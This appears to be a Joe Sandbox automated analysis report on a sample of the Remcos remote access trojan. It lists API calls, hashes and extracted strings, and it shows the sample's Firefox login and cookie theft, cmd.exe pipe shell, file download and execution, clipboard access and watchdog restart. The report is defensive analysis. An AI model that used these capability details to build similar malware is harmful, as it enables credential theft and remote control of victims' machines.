              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
              • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
              • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
            • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
            • API String ID: 1529173511-1365410817
            • Opcode ID: faed5817389e9e1c44c9bd25bc2e5785f6855519673eedd1caaf3ae8bfa0178d
            • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
            • Opcode Fuzzy Hash: faed5817389e9e1c44c9bd25bc2e5785f6855519673eedd1caaf3ae8bfa0178d
            • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E
            Function 00404E06 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
            • FindCloseChangeNotification.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
            • closesocket.WS2_32(?), ref: 00404E3A
            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
            • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
            • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
            • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
            • String ID:
            • API String ID: 2403171778-0
            • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
            • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
            • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
            • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58
            Function 00445A95 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 437 445a95-445aa9 438 445ab6-445ad1 LoadLibraryExW 437->438 439 445aab-445ab4 437->439 441 445ad3-445adc GetLastError 438->441 442 445afa-445b00 438->442 440 445b0d-445b0f 439->440 443 445ade-445ae9 LoadLibraryExW 441->443 444 445aeb 441->444 445 445b02-445b03 FreeLibrary 442->445 446 445b09 442->446 447 445aed-445aef 443->447 444->447 445->446 448 445b0b-445b0c 446->448 447->442 449 445af1-445af8 447->449 448->440 449->448
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
            • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
            • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
            • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
            • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8
            Function 004459F9 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 458 4459f9-445a23 459 445a25-445a27 458->459 460 445a8e 458->460 461 445a2d-445a33 459->461 462 445a29-445a2b 459->462 463 445a90-445a94 460->463 464 445a35-445a37 call 445a95 461->464 465 445a4f 461->465 462->463 470 445a3c-445a3f 464->470 466 445a51-445a53 465->466 468 445a55-445a63 GetProcAddress 466->468 469 445a7e-445a8c 466->469 471 445a65-445a6e call 432123 468->471 472 445a78 468->472 469->460 473 445a70-445a76 470->473 474 445a41-445a47 470->474 471->462 472->469 473->466 474->464 476 445a49 474->476 476->465
            APIs
            • GetProcAddress.KERNEL32(00000000,?), ref: 00445A59
            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00445A66
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc__crt_fast_encode_pointer
            • String ID:
            • API String ID: 2279764990-0
            • Opcode ID: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
            • Instruction ID: f797c493580bcbb57e031b514bcf368a6941c3076375826e2c1e25af396318bd
            • Opcode Fuzzy Hash: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
            • Instruction Fuzzy Hash: AA113A37A009319BAF21DE69ECC086B7391AB847247164332FC15BB346E634EC0286E9
            Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 478 40163e-401644 479 401646-401648 478->479 480 401649-401654 478->480 481 401656 480->481 482 40165b-401665 480->482 481->482 483 401667-40166d 482->483 484 401688-401689 call 43229f 482->484 483->484 486 40166f-401674 483->486 487 40168e-40168f 484->487 486->481 488 401676-401686 call 43229f 486->488 490 401691-401693 487->490 488->490
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
            • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
            • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
            • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D
            Function 0044D2B4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 492 44d2b4-44d2c1 call 443005 494 44d2c6-44d2d1 492->494 495 44d2d7-44d2df 494->495 496 44d2d3-44d2d5 494->496 497 44d31f-44d32d call 443c92 495->497 498 44d2e1-44d2e5 495->498 496->497 499 44d2e7-44d319 call 445fb3 498->499 504 44d31b-44d31e 499->504 504->497
            APIs
              • Part of subcall function 00443005: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
            • _free.LIBCMT ref: 0044D320
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap_free
            • String ID:
            • API String ID: 614378929-0
            • Opcode ID: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
            • Instruction ID: 6435cefd8bbe106a332e767b8e47ea9a619cae55f612b2c95de9f127ac4edb1d
            • Opcode Fuzzy Hash: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
            • Instruction Fuzzy Hash: 260149736003056BF321CF69D885E5AFBE8FB89374F25061EE585832C0EA34A905C738
            Function 00443005 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 505 443005-443010 506 443012-44301c 505->506 507 44301e-443024 505->507 506->507 508 443052-44305d call 43ad91 506->508 509 443026-443027 507->509 510 44303d-44304e RtlAllocateHeap 507->510 515 44305f-443061 508->515 509->510 511 443050 510->511 512 443029-443030 call 442a57 510->512 511->515 512->508 518 443032-44303b call 440480 512->518 518->508 518->510
            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
            • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
            • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
            • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD
            Function 00443649 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 521 443649-443655 522 443687-443692 call 43ad91 521->522 523 443657-443659 521->523 530 443694-443696 522->530 524 443672-443683 RtlAllocateHeap 523->524 525 44365b-44365c 523->525 527 443685 524->527 528 44365e-443665 call 442a57 524->528 525->524 527->530 528->522 533 443667-443670 call 440480 528->533 533->522 533->524
            APIs
            • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
            • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
            • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
            • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD

            Non-executed Functions

            Function 00410B5C Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentProcessId.KERNEL32 ref: 00410B6B
              • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
              • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
              • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
            • CloseHandle.KERNEL32(00000000), ref: 00410BBA
            • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
            • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
            • API String ID: 3018269243-1736093966
            • Opcode ID: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
            • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
            • Opcode Fuzzy Hash: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
            • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
            Function 00406D28 Relevance: 32.3, APIs: 9, Strings: 9, Instructions: 810fileCOMMON
            Download Yara Rule
            APIs
            • SetEvent.KERNEL32(?,?), ref: 00406D4A
            • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
            • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
              • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
              • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
              • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
              • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
              • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
              • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
              • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
            • DeleteFileA.KERNEL32(?), ref: 0040768E
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
            • API String ID: 1385304114-1507758755
            • Opcode ID: cb2d756319963123cdc946bd025587b190db48c268333e126865797fa68f4cfa
            • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
            • Opcode Fuzzy Hash: cb2d756319963123cdc946bd025587b190db48c268333e126865797fa68f4cfa
            • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
            Function 0040567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
            Download Yara Rule
            APIs
            • __Init_thread_footer.LIBCMT ref: 004056C6
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            • __Init_thread_footer.LIBCMT ref: 00405703
            • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
            • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
            • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
              • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
            • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
            • TerminateProcess.KERNEL32(00000000), ref: 004059F7
            • CloseHandle.KERNEL32 ref: 00405A03
            • CloseHandle.KERNEL32 ref: 00405A0B
            • CloseHandle.KERNEL32 ref: 00405A1D
            • CloseHandle.KERNEL32 ref: 00405A25
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
            • String ID: SystemDrive$cmd.exe
            • API String ID: 2994406822-3633465311
            • Opcode ID: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
            • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
            • Opcode Fuzzy Hash: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
            • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
            Function 0040AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
            • FindClose.KERNEL32(00000000), ref: 0040AB0A
            • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
            • FindClose.KERNEL32(00000000), ref: 0040AC53
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Find$CloseFile$FirstNext
            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
            • API String ID: 1164774033-3681987949
            • Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
            • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
            • Opcode Fuzzy Hash: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
            • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
            Function 0040AC78 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
            • FindClose.KERNEL32(00000000), ref: 0040AD0A
            • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
            • FindClose.KERNEL32(00000000), ref: 0040ADF0
            • FindClose.KERNEL32(00000000), ref: 0040AE11
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Find$Close$File$FirstNext
            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
            • API String ID: 3527384056-432212279
            • Opcode ID: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
            • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
            • Opcode Fuzzy Hash: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
            • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
            Function 00414EC1 Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON
            Download Yara Rule
            APIs
            • OpenClipboard.USER32 ref: 00414EC2
            • EmptyClipboard.USER32 ref: 00414ED0
            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
            • GlobalLock.KERNEL32(00000000), ref: 00414EF9
            • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
            • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
            • CloseClipboard.USER32 ref: 00414F55
            • OpenClipboard.USER32 ref: 00414F5C
            • GetClipboardData.USER32(0000000D), ref: 00414F6C
            • GlobalLock.KERNEL32(00000000), ref: 00414F75
            • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
            • CloseClipboard.USER32 ref: 00414F84
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
            • String ID:
            • API String ID: 3520204547-0
            • Opcode ID: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
            • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
            • Opcode Fuzzy Hash: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
            • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
            Function 0041A01B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
              • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
            • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
            • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
            • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
            • String ID: 05#v`#v
            • API String ID: 2341273852-3697325483
            • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
            • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
            • Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
            • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
            Function 004175E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: 0$1$2$3$4$5$6$7
            • API String ID: 0-3177665633
            • Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
            • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
            • Opcode Fuzzy Hash: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
            • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
            Function 004186FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
            Download Yara Rule
            APIs
            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
            • GetLastError.KERNEL32 ref: 00418771
            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
